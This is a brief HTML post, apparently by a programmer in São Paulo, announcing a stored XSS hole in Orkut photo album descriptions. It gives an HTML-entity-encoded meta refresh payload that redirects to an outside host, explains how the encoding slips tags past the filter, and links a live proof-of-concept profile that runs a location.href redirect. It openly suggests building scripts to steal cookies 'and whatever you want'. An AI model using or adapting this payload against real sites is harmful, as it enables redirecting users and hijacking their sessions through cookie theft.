<div>Greetings!</div>
<div>Doing hard searches and working hard seeking for xss holes we finally found!<br><br>The new hole is in the&nbsp;description of the&nbsp;pic, you can put html encode chars like this.</div>
<div>&nbsp;</div>
<div>&amp; l t ; meta http-equiv=&quot;refresh&quot; content=&quot;0;url=<a href="http://suafakeaqui">http://suafakeaqui</a>&quot; &amp; g t ;</div>
<div>&nbsp;</div>
<div>&amp;lt; means &lt; (minus) or open tag.<br>&amp;gt; means &gt; ( more ) or close tag.</div>
<div>&nbsp;</div>
<div>So you can build great javascripts to stole cookies and whatever you want ;)</div>
<div>&nbsp;</div>
<div><strong>Proof of concept:</strong><br><br>My Profile: <a href="http://www.orkut.com/Album.aspx?uid=4196484633792069568">http://www.orkut.com/Album.aspx?uid=4196484633792069568</a>&nbsp;( just a javascript with location.href=&#39;mypersonalwebsite.com
&#39; )</div>
<div>&nbsp;</div>
<div>Thanks to Pedro Boara ( <a href="http://www.suspensa.info">http://www.suspensa.info</a> )</div>
<div>&nbsp;</div>
<div>Att;</div>
<div>Fábio N Sarmento<br>Programmer</div>
<div>São Paulo / Brazil</div>